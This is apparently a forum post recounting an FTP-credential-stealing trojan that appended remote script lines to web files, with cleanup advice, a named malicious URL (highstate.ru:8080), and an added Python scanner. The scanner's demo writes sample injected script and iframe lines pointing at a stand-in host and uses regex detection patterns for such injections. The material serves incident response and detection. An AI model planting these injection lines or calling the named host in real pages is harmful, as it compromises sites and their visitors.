Hi everyone,
I had the same problem: Windows up to date, antivirus up to date (AVG on the first and Symantec on my second computer), antispyware up to date... I never install "strange things", so I thought that I was protected.
Suddenly all of the sites/accounts in my FileZilla were infected by a JS:Illredir-CB [Trj] trojan.
It happened after visiting the website of a big company.
This trojan came onto my computer without any warning... so easy.
The script was a JavaScript function: all kinds of tricks to create a link to a remote site on port 8080.
This one put a Java applet in an iframe, and this opened a CMD in the background which installed some files locally in system32.
What I did:
- DELETE all your FTP login settings, or set all the accounts to "ask for password".
- I changed ALL the settings of the FTP accounts. (DO IT, because I forgot one, and that one was touched again 3 days later.)
- Scan your computer entirely. I noticed at this moment that only AVAST detected this one (I did try a lot of scanners).
- ALL your FTP sites are touched... and every folder... in my case also the https files... so you have to check all the files (check them on date/time).
Check all the .JS files and all the files with names like "home", "default" and "index"... at the bottom of the file an extra line is written. (They are not all the same!! ... but they look alike.)
Some of my files were totally corrupt, so I had to take the backup for those.
In the FTP log files of the server I see several attempts to connect with the old settings... so they try it more than once.
I took a good look at the scripts which infected my computer: in my case the function opened the backdoor to
[ http:// highstate . ru: 8080 /google.com/stumbleupon.com/btjunkie.org.php ]
but I saw in some other scripts that highstate.ru is not the only domain...
Check these links for what Norton says about these domains:
[ https:// safeweb.norton.com/ report/show?name=anyscent.ru ]
or
[ https:// safeweb.norton.com/ report/show?name=highstate.ru ]
Latest ones I saw:
index.html: JS:Illredir-CB [Trj] ++
exemple.htm [L] HTML:Downloader-F [Trj] ++
Applet1.htm [L] JS:Jaderun-A [Expl]. All by the same method: a remote script at the bottom of a webpage / JS file.
Nice example: at this moment there is a trojan on THIS SITE: [ http:// wordpress.org /support/topic/349452 ]
My AVAST saw this one and disabled the page.
I hope somebody can do something with my experience!!
( :-) Sorry about the language mistakes, but I am Dutch (-: )
kind regards,
Harts from Holland
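The post above says to check every index/home/default file and every .js file on the server by date/time, because the injection is an extra line appended at the bottom. The script below is an added example (not the poster's code and not the actual injected script) that automates that check: it walks a web root, keeps only the file names the post mentions, skips files not modified since a cut-off time, and inspects the last few lines for a remote script/iframe tag or an obfuscated writer. The name pattern, the indicator patterns, the sample files and the `bad.example.invalid:8080` URL are all constructed assumptions for the demo.

```python
#!/usr/bin/env python3
"""Find web files whose trailing lines carry an appended remote script/iframe.

Added example, not from the original post. Everything below (name pattern,
indicator patterns, sample tree) is an assumption built for the demo; the
sample "injected" lines are constructed, not copies of the real malware.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# File names the post says were touched (assumed pattern): index.*, home.*, default.*, *.js
TARGET_NAME = re.compile(r"^(index|home|default)\.\w+$|\.js$", re.IGNORECASE)

# Indicators of an appended loader line (constructed, deliberately broad):
#  - <script src=...> / <iframe src=...> pointing at an absolute http(s) URL, e.g. host:8080/...
#  - document.write(unescape(...)) and eval("...") used to build such tags at runtime
SUSPICIOUS = [
    ("remote script/iframe tag",
     re.compile(r"<(script|iframe)[^>]*\bsrc\s*=\s*[\"']?https?://[^\s\"'>]+", re.I)),
    ("document.write(unescape(...))", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("eval of string literal", re.compile(r"\beval\s*\(\s*[\"']", re.I)),
]

TAIL_LINES = 3  # the post says the extra line is at the bottom of the file


def inspect_tail(text):
    """Return an indicator name if one of the last TAIL_LINES non-empty lines matches, else None."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    for line in lines[-TAIL_LINES:]:
        for reason, pat in SUSPICIOUS:
            if pat.search(line):
                return reason
    return None


def scan_webroot(root, since_epoch):
    """Return [(relative_path, reason)] for target files modified at/after since_epoch."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*"), key=str):
        if not path.is_file() or not TARGET_NAME.search(path.name):
            continue
        if path.stat().st_mtime < since_epoch:
            continue  # untouched since the cut-off date you are checking against
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        reason = inspect_tail(text)
        if reason:
            findings.append((path.relative_to(root).as_posix(), reason))
    return findings


def build_demo_tree(base):
    """Write a constructed sample web root into base and return the cut-off time used."""
    base = Path(base)
    (base / "js").mkdir(parents=True, exist_ok=True)
    cutoff = time.time() - 3600  # assume the incident happened within the last hour
    old = cutoff - 86400         # mtime well before the cut-off

    clean = "<html><body>Hello</body></html>\n"
    # Constructed sample lines; NOT the real injected code from the post.
    injected_tag = '<script src="http://bad.example.invalid:8080/x.php"></script>\n'
    injected_js = 'document.write(unescape("%3Ciframe%20src%3D..."));\n'

    samples = {
        "index.html": (clean + injected_tag, cutoff + 60),  # target name, recent, infected
        "about.html": (clean + injected_tag, cutoff + 60),  # infected but not a target name
        "default.htm": (clean, cutoff + 60),                # target name, recent, clean
        "home.php": (clean + injected_tag, old),            # infected but mtime older than cut-off
        "js/app.js": ("function f(){}\n" + injected_js, cutoff + 60),
    }
    for rel, (content, mtime) in samples.items():
        p = base / rel
        p.write_text(content)
        os.utime(p, (mtime, mtime))
    return cutoff


def run_demo():
    """Build the sample tree in a temp dir; return (findings since cut-off, findings ignoring mtime)."""
    with tempfile.TemporaryDirectory() as tmp:
        since = build_demo_tree(tmp)
        return scan_webroot(tmp, since), scan_webroot(tmp, 0)


if __name__ == "__main__":
    recent, everything = run_demo()
    for rel, why in recent:
        print(f"{rel}: {why}")
    # Second pass with since=0: catches files whose mtime was preserved or reset.
    print("ignoring mtime:", everything)
```

Two caveats from the demo: the date/time filter misses `home.php`, whose modification time predates the cut-off, so run a second pass with `since_epoch=0` (or compare against a clean backup) rather than trusting mtimes alone; and the name filter misses `about.html`, so widen `TARGET_NAME` to every `.html`/`.htm`/`.php`/`.js` file once the first pass has shown what the appended line looks like on your server.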